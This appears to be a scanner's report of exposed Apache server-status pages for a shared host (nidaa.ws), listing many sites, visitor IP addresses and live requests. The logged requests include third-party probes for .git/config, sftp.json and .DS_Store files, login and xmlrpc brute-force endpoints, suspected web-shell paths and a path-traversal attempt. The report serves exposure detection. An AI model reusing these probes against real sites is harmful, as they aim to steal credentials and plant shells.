      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-1149340/209/1733_
      31.132855317150460.028.00180.40
      168.138.41.19http/1.1wahjcm.com:443GET /ioxi002.PhP7 HTTP/1.1
      
      0-1149340/222/1375_
      31.14238336896490.04.84236.36
      168.138.41.19http/1.1wahjcm.com:443GET /fosil.php HTTP/1.1
      
      0-1149340/196/1443_
      31.2012717327840.09.66124.43
      114.119.159.61http/1.1alezdhar.com:443GET /robots.txt HTTP/1.1
      
      0-1149340/241/1445_
      30.7934009890620.035.90164.36
      37.224.255.145http/1.1
      
      0-1149340/198/1504_
      31.236115914067690.023.57236.58
      50.60.207.58http/1.1albayan.edu.sa:443GET /imgweb/1445/sc3.pdf HTTP/1.1
      
      0-1149340/221/1367_
      29.72235510693760.016.31183.82
      152.32.235.85http/1.1
      
      0-1149340/192/1597_
      31.07369414471160.026.94197.63
      51.36.227.149http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/b6GoWXwEWeH2UhZOnsDcER
      
      0-1149340/186/1426_
      31.191451149613170.073.35249.79
      51.252.159.6http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/roSFLGhvHt7hMVCBsTLqdc
      
      0-1149340/253/1934_
      31.09358419510690.059.52246.70
      54.195.61.108http/1.1albayan.edu.sa:443GET /web/250.html2 HTTP/1.1
      
      0-1149340/308/1579_
      31.10332189160880.06.99254.91
      37.224.255.145http/1.1jawad.com.sa:443POST /api/v.1/front/new/product?page=0 HTTP/1.1
      
      0-1149340/203/1341_
      30.922320211940060.018.65158.18
      152.32.235.85http/1.1
      
      0-1149341/182/1713K
      31.2402144413866.818.22162.32
      172.69.150.189http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-1149340/280/1558_
      31.2180115493320.034.28288.11
      50.60.207.58http/1.1albayan.edu.sa:443GET /e_sch/images/menu_school.jpg HTTP/1.1
      
      0-1149340/226/1586_
      31.1518525232020.013.94186.58
      168.138.41.19http/1.1wahjcm.com:80GET /.well-known/pki-validation/wp-login.php HTTP/1.1
      
      0-1149340/237/1560_
      31.142503613988210.019.61126.39
      168.138.41.19http/1.1wahjcm.com:443GET /erin1.PhP7 HTTP/1.1
      
      0-1149340/164/1384_
      31.093452696763530.031.59266.46
      51.36.227.149http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-1149340/213/1425_
      31.13266156680510.08.90242.33
      51.36.227.149http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-1149340/216/1580_
      31.083691988610455730.07.47266.44
      47.128.53.22http/1.1daris.live:443GET /assets/default/vendor/jquery/jquery.min.js HTTP/1.1
      
      0-1149340/231/1729_
      31.1229529493160.06.17202.39
      37.224.255.145http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-1149340/177/1457_
      31.15164010021830.015.14146.79
      54.36.149.93http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=5&q=1062&t=54.36.150.122&c=5 HTTP
      
      0-1149340/229/1528_
      31.15226111344120.051.38154.77
      66.249.93.76http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/useanyfont/uaf.css?ver=1716626587 HTTP/
      
      0-1149340/251/1540_
      31.10311154336920.011.76208.35
      37.224.255.145http/1.1jawad.com.sa:443POST /api/v.1/front/category/product HTTP/1.1
      
      0-1149340/207/1478_
      31.201081496397300.089.02242.18
      50.60.207.58http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-1149340/225/1475_
      31.24738034100.014.08203.83
      20.15.133.186http/1.1albayan.edu.sa:443GET /e_sch/code/news/ HTTP/1.1
      
      0-1149340/289/1699_
      31.011061437263000.017.97209.34
      51.36.221.252http/1.1
      
      1-161180/39/1346_
      3.13145221980340.05.21244.55
      51.252.159.6http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/U132RHf6WqKoxFZzDuMFzn
      
      1-161180/21/1483_
      2.503401910627840.02.06248.55
      37.224.255.145http/1.1
      
      1-161180/16/1418_
      3.156487023490.00.29191.50
      172.71.160.78http/1.1adyar.com.sa:80GET /simple.php HTTP/1.1
      
      1-161180/29/1459_
      2.92350210059300.01.22209.84
      47.128.53.22http/1.1daris.live:443GET /assets/default/404/images/404.png HTTP/1.1
      
      1-161180/26/1448_
      2.9724206246460.02.86172.47
      54.36.149.55http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=994&t=54.36.150.33&c=5 HTTP/1
      
      1-161180/34/1284_
      2.9136968200340.01.46196.00
      51.36.227.149http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      1-161180/23/1341_
      3.0323213986468830.01.63153.12
      51.36.221.252http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/1E3A0691-1-scaled.jpg HTTP/1.1
      
      1-161180/13/1375_
      3.13129011275960.00.65135.80
      168.138.41.19http/1.1wahjcm.com:80GET /wp-content/uploads
      Found on 2024-05-25 08:47
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df798e2ffd9

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 24-May-2024 08:27:58 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  1 day 4 hours 23 minutes 9 seconds
      Server load: 0.34 0.38 0.39
      Total accesses: 171367 - Total Traffic: 25.8 GB - Total Duration: 201121658
      CPU Usage: u129.76 s20.31 cu635.83 cs129.82 - .896% CPU load
      1.68 requests/sec - 264.4 kB/second - 157.7 kB/request - 1173.63 ms/request
      9 requests currently being processed, 0 workers gracefully restarting, 216 idle workers
      _____K___________________________________________K___K__________
      ______________________K______________________K__________________
      ____K_______________________________K__________________K________
      ________........................................................
      ..................._____________________W___....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0243810/87/974_
      14.80169211072270.021.45109.33
      2.90.238.93http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-0243810/125/686_
      14.5721213134780.015.90164.22
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /backup/.git/config HTTP/1.1
      
      0-0243810/132/821_
      14.74172306190990.016.9885.75
      178.86.23.219http/1.1jawad.com.sa:443POST /api/v.1/front/subscribe/add HTTP/1.1
      
      0-0243810/115/754_
      14.8216622496950.016.7381.45
      2.90.238.93http/1.1albayan.edu.sa:443GET /e_sch/jwysiwyg/jquery.wysiwyg.css HTTP/1.1
      
      0-0243810/215/831_
      14.5621205494770.09.56125.16
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /flock/.git/config HTTP/1.1
      
      0-0243811/88/665K
      14.920248880466.816.0996.92
      172.70.246.173http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-0243810/83/881_
      14.532211915297900.045.7998.87
      37.224.237.157http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-0243810/66/722_
      14.5721206105890.020.98122.58
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /private/.git/config HTTP/1.1
      
      0-0243810/136/1063_
      14.9113124348640.023.28152.35
      188.53.225.138http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.ttf HTTP/1.1
      
      0-0243810/166/812_
      14.7617155045980.021.49143.92
      178.86.23.219http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/DW5O2BDe5rsHufZSZ9Rpjc
      
      0-0243810/138/601_
      14.891364209335390.012.50109.68
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=3&q=1457&t=167.114.100.201&c=5 HT
      
      0-0243810/127/849_
      14.68185156011665860.021.45118.48
      178.86.23.219http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/____________%20_______
      
      0-0243810/78/774_
      14.5821108025600.089.58196.62
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /web/.git/config HTTP/1.1
      
      0-0243810/76/816_
      14.5521202266630.010.10117.52
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /demo/.git/config HTTP/1.1
      
      0-0243810/78/883_
      14.5521207448170.06.8993.71
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /data/.git/config HTTP/1.1
      
      0-0243810/156/715_
      14.5421203694110.033.38142.15
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /api/.git/config HTTP/1.1
      
      0-0243810/129/793_
      14.5721204071360.017.06155.41
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /log/.git/config HTTP/1.1
      
      0-0243810/157/835_
      14.5521205487200.034.88170.07
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /dev/.git/config HTTP/1.1
      
      0-0243810/187/977_
      14.5223307163010.020.50128.54
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1437&t=220.241.60.134&c=5 HTT
      
      0-0243810/238/779_
      14.5222205578710.019.9661.49
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1439&t=192.99.15.34&c=5 HTTP/
      
      0-0243810/118/774_
      14.5821105029170.06.3981.47
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /templates/.git/config HTTP/1.1
      
      0-0243810/149/844_
      14.6419461709060.026.55128.15
      178.86.23.219http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-0243810/183/854_
      14.89149235172845620.043.48132.48
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/file42/wordwall.mp4 HTTP/1.1
      
      0-0243810/122/733_
      14.61196132633290.043.97146.00
      178.86.23.219http/1.1jawad.com.sa:443GET /ar/category/118 HTTP/1.1
      
      0-0243810/189/926_
      14.8914353239900.039.72115.93
      178.86.23.219http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/LYox4IhB7DIxG5UQ39sf0s
      
      1-0244090/95/725_
      13.8019613919013130.08.10149.44
      178.86.23.219http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      1-0244090/174/810_
      13.7919204592590.036.66167.45
      195.191.219.133http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=3&q=1451&t=5.9.61.101&c=5 HTTP/1.
      
      1-0244090/73/756_
      13.7821204828630.024.53164.81
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /samples/.git/config HTTP/1.1
      
      1-0244090/123/821_
      13.84172218591810.013.32136.55
      178.86.23.219http/1.1jawad.com.sa:443POST /api/v.1/front/category/product HTTP/1.1
      
      1-0244090/81/772_
      13.8517201620040.05.3886.84
      2.90.238.93http/1.1albayan.edu.sa:443GET /e_sch/images/complaints_and_suggestions.png HTTP/1.1
      
      1-0244090/77/673_
      13.7721206278420.011.68126.26
      104.234.204.32http/1.1sradmin.3dvi.com:443GET /modules/.git/config HTTP/1.1
      
      1-0244090/90/756_
      13.8913123904530.040.40119.43
      188.53.225.138http/1.1albayan.edu
      Found on 2024-05-24 05:27
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df73caee009

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Friday, 24-May-2024 07:07:39 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  1 day 3 hours 2 minutes 49 seconds
      Server load: 0.22 0.31 0.34
      Total accesses: 165569 - Total Traffic: 25.4 GB - Total Duration: 142587620
      CPU Usage: u120.91 s20.13 cu618.69 cs125.99 - .91% CPU load
      1.7 requests/sec - 273.5 kB/second - 160.8 kB/request - 861.198 ms/request
      17 requests currently being processed, 0 workers gracefully restarting, 208 idle workers
      _________K____________________K___K_____________________________
      ___K______________K__K__________K__________________K_____K______
      _______________K_K_________________________K___KK_______________
      ______K_.........W..............................................
      ...................____________________W_K__....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0243810/61/948_
      11.35294011063250.020.38108.27
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1355&t=192.99.37.133&c=5 HTTP
      
      0-0243810/99/660_
      11.3812602842710.014.88163.20
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1359&t=135.181.113.236&c=5 HT
      
      0-0243810/99/788_
      11.1653306141510.015.7684.53
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1191&t=78.46.63.108&c=5 HTTP/
      
      0-0243810/97/736_
      11.3033502487270.016.4581.17
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1354&t=192.99.37.133&c=5 HTTP
      
      0-0243810/101/717_
      11.3619105479540.09.44125.05
      54.36.148.195http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=984&t=54.36.148.115&c=5 HTTP/
      
      0-0243810/75/652_
      11.3624104779980.015.7496.57
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1356&t=65.108.46.72&c=5 HTTP/
      
      0-0243810/63/861_
      11.396105252980.044.1997.27
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1360&t=192.99.101.79&c=5 HTTP
      
      0-0243810/56/712_
      11.42715520400.020.53122.13
      51.39.113.21http/1.1albayan.edu.sa:443GET /apple-touch-icon.png HTTP/1.1
      
      0-0243810/115/1042_
      11.2834714341370.022.85151.91
      66.249.93.35http/1.1albayan.edu.sa:443GET /.well-known/traffic-advice HTTP/1.1
      
      0-0243811/123/769K
      11.42013552970.819.68142.11
      172.70.247.217http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-0243810/123/586_
      11.362792209332080.012.30109.47
      47.128.34.131http/1.1daris.live:80GET /bin/admin/social%20icon/youtube.png HTTP/1.1
      
      0-0243810/105/827_
      11.17455011307470.019.88116.91
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1220&t=78.46.63.108&c=5 HTTP/
      
      0-0243810/58/754_
      11.3716707991850.088.01195.05
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1358&t=192.99.101.79&c=5 HTTP
      
      0-0243810/58/798_
      11.411658722154860.09.38116.80
      216.244.66.198http/1.1albayan.edu.sa:443GET /imgweb/qb40/6/com11.pdf HTTP/1.1
      
      0-0243810/62/867_
      11.37181456244970.03.3690.19
      82.167.40.26http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-0243810/146/705_
      11.3910313472680.029.98138.75
      5.255.231.187http/1.1alnwisher.com:443GET /robots.txt HTTP/1.1
      
      0-0243810/112/776_
      11.3717403872280.015.56153.91
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1358&t=144.76.38.40&c=5 HTTP/
      
      0-0243810/117/795_
      11.3620905223960.033.51168.70
      45.158.14.229http/1.13dvi.com:80GET /wp-login.php HTTP/1.1
      
      0-0243810/169/959_
      11.0236417159070.020.33128.37
      198.71.229.93http/1.1
      
      0-0243810/212/753_
      11.3714705541980.018.7160.25
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1358&t=65.108.143.154&c=5 HTT
      
      0-0243810/105/761_
      11.1654504437270.05.5880.66
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1191&t=148.251.69.139&c=5 HTT
      
      0-0243810/121/816_
      11.3530241702370.026.37127.97
      195.191.219.132http/1.1albayan.edu.sa:443GET /e_sch/code/news/db.php?j=2&q=1355&t=192.99.13.186&c=5 HTTP
      
      0-0243810/115/786_
      11.2338502358330.041.92130.92
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1352&t=192.99.13.186&c=5 HTTP
      
      0-0243810/50/661_
      11.17500592612540.043.00145.03
      217.133.221.210http/1.1trynidaa.com:443POST /wp-login.php HTTP/1.1
      
      0-0243810/109/846_
      11.1658403059480.035.09111.30
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1188&t=65.108.46.72&c=5 HTTP/
      
      1-0244090/81/711_
      10.783505818911890.07.82149.17
      72.14.201.95http/1.1albayan.edu.sa:443GET /web/49.html2 HTTP/1.1
      
      1-0244090/153/789_
      11.0217103978730.035.36166.15
      127.0.0.1http/1.1php.we3dvi.com:80GET / HTTP/1.0
      
      1-0244090/50/733_
      10.74581524667910.024.22164.51
      40.77.167.14http/1.1albayan.edu.sa:443GET /e_sch/forum_replies.php?user=web2&i_f=473&page=1 HTTP/1.1
      
      1-0244090/106/804_
      10.8723508582900.012.91136.14
      195.191.219.132http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=2&q=1356&t=92.220.10.100&c=5 HTTP
      
      1-0244090/55/746_
      10.77364861596470.05.0186.48
      198.71.229.93http/1.1trydaris.com:80POST /xmlrpc.php HTTP/1.1
      
      1-0244093/56/652K
      11.084362607410.610.53125.11
      51.39.113.21http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css H
      Found on 2024-05-24 04:07
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7b87aa455

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 23-May-2024 05:33:00 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 1
      Parent Server MPM Generation: 0
      Server uptime:  1 hour 28 minutes 10 seconds
      Server load: 0.45 0.27 0.25
      Total accesses: 2603 - Total Traffic: 594.0 MB - Total Duration: 1085824
      CPU Usage: u17.61 s3.28 cu0 cs0 - .395% CPU load
      .492 requests/sec - 115.0 kB/second - 233.7 kB/request - 417.143 ms/request
      18 requests currently being processed, 0 workers gracefully restarting, 182 idle workers
      __K__________K___________________________K______K__________K____
      K_________WK____________K_W_________K___________K____________K__
      _______________________K_____________K_________KC_____________K_
      ________........................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-0295290/16/16_
      2.28389253793810.012.9412.94
      51.36.232.215http/1.1albayan.edu.sa:443GET /imgweb/file43/G9%20Basic%20Skills%20T3%20WB.pdf HTTP/1.1
      
      0-0295290/18/18_
      2.38229818340.00.630.63
      35.93.79.55http/1.1white-petals.com:443GET /robots.txt HTTP/1.1
      
      0-0295291/10/10K
      2.480215966.80.140.14
      172.70.251.146http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-0295290/13/13_
      2.30331127200.00.210.21
      195.191.219.130http/1.1jawad.com.sa:80GET / HTTP/1.1
      
      0-0295290/15/15_
      2.383022619010.00.260.26
      123.125.109.195http/1.1garndhabi.org:80GET / HTTP/1.1
      
      0-0295290/26/26_
      2.47129984790.04.294.29
      174.138.82.83http/1.1attendance.thenewjeddah.com:443GET / HTTP/1.1
      
      0-0295290/21/21_
      2.48835612840.00.850.85
      5.110.21.53http/1.1alezdhar.com:443GET /videos/Zed-450-1.mp4 HTTP/1.1
      
      0-0295290/11/11_
      2.4153220930.07.407.40
      182.40.104.255http/1.1abu-helal.com:80GET / HTTP/1.1
      
      0-0295290/14/14_
      2.3918965249550.016.0016.00
      5.110.21.53http/1.1alezdhar.com:443GET / HTTP/1.1
      
      0-0295290/17/17_
      2.401794429320.01.041.04
      205.185.116.34http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-0295290/12/12_
      2.099957040.00.590.59
      5.110.21.53http/1.1
      
      0-0295290/10/10_
      2.1212173760.00.100.10
      174.138.82.83http/1.1
      
      0-0295290/10/10_
      2.41159251134690.09.529.52
      5.110.21.53http/1.1alezdhar.com:443GET /images/company-bg.png HTTP/1.1
      
      0-0295291/12/12K
      2.49019540.80.290.29
      172.68.195.224http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-0295290/25/25_
      2.4632311660.01.241.24
      176.16.35.255http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-0295290/10/10_
      2.21476102522220.07.817.81
      66.249.64.14http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/03_70261_1.pdf HTTP/1.1
      
      0-0295290/16/16_
      2.2146513400.00.130.13
      172.105.16.34http/1.1hawsab.me:80GET /.vscode/sftp.json HTTP/1.1
      
      0-0295290/6/6_
      2.175227375150050.02.052.05
      31.167.231.170http/1.1albayan.edu.sa:443GET /imgweb/file44/71%20%D8%AA%D8%A7%D8%A8%D8%B9%20%D8%AF%D9%84
      
      0-0295290/9/9_
      2.21469381650.00.140.14
      139.162.210.205http/1.1trynidaa.com:80GET /s/8343e2130323e2130323e2833313/_/;/META-INF/maven/com.atla
      
      0-0295290/9/9_
      2.214727016470.01.951.95
      139.162.210.205http/1.1trynidaa.com:80GET /v2/_catalog HTTP/1.1
      
      0-0295290/11/11_
      1.97361162218090.09.699.69
      128.14.211.186http/1.1
      
      0-0295290/9/9_
      2.22465118110.00.190.19
      172.105.16.34http/1.1hawsab.me:80GET /.DS_Store HTTP/1.1
      
      0-0295290/33/33_
      2.38301311320.02.942.94
      178.86.107.84http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-0295290/17/17_
      2.234234399940.01.011.01
      142.154.82.60http/1.1albayan.edu.sa:443GET /web/251.html2 HTTP/1.1
      
      0-0295290/10/10_
      2.3034519240.00.110.11
      216.244.66.198http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/______________%20____________
      
      1-0295300/9/9_
      2.473782673492740.06.026.02
      216.244.66.198http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/fbssb06.pdf HTTP/1.1
      
      1-0295300/15/15_
      2.53338297692790.03.643.64
      5.110.21.53http/1.1alezdhar.com:443GET /videos/Zed-450-1.mp4 HTTP/1.1
      
      1-0295300/16/16_
      2.572900272060.021.6121.61
      54.36.148.208http/1.1albayan.edu.sa:80GET /e_sch/code/news/db.php?j=1&q=994&t=54.36.150.105&c=5 HTTP/
      
      1-0295300/15/15_
      2.651796126560.01.731.73
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      1-0295300/23/23_
      2.5822143854060.01.381.38
      66.249.79.204http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%B4%D9%87%D8%A7%D8%AF%D8%A7%D8%AA%20%D8%AA%
      
      1-0295300/11/11_
      2.65159415490.00.180.18
      5.110.21.53http/1.1alezdhar.com:443GET /images/company-4.png HTTP/1.1
      
      1-0295300/22/22_
      2.533334222890.00.920.92
      195.191.219.130http/1.1jawad.com.sa:443GET / HTTP/1.1
      
      1-0295300/25/25_
      2.5730312114690.01.091.09
      178.86.107.84http/1.1albayan.edu.sa:443GET /images/slider/04.jpg HTTP/1.1
      
      1-0295300/12/12_
      2.1618912530291190.054.1454.14
      5.110.21.53http/1.1
      
      1-0295300/18/18_
      2.72355010.00.760.76
      5.110.21.53http/1.1
      Found on 2024-05-23 02:33
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df79b9d857f

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.20
      Server MPM: worker
      Server Built: May 15 2024 04:00:33
      
      Current Time: Thursday, 23-May-2024 02:22:32 +03
      Restart Time: Friday, 17-May-2024 13:23:21 +03
      Parent Server Config. Generation: 13
      Parent Server MPM Generation: 12
      Server uptime:  5 days 12 hours 59 minutes 11 seconds
      Server load: 0.13 0.30 0.37
      Total accesses: 831100 - Total Traffic: 136.2 GB - Total Duration: 1614792257
      CPU Usage: u270.76 s16.25 cu3407.54 cs852.19 - .95% CPU load
      1.74 requests/sec - 298.2 kB/second - 171.8 kB/request - 1942.96 ms/request
      15 requests currently being processed, 0 workers gracefully restarting, 235 idle workers
      ______K_________K___K____________R__K___________________________
      W__W______________________________K________W____________________
      _______________K_______________________K_______________________K
      _____KR_........................._______________________________
      _________________K_.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
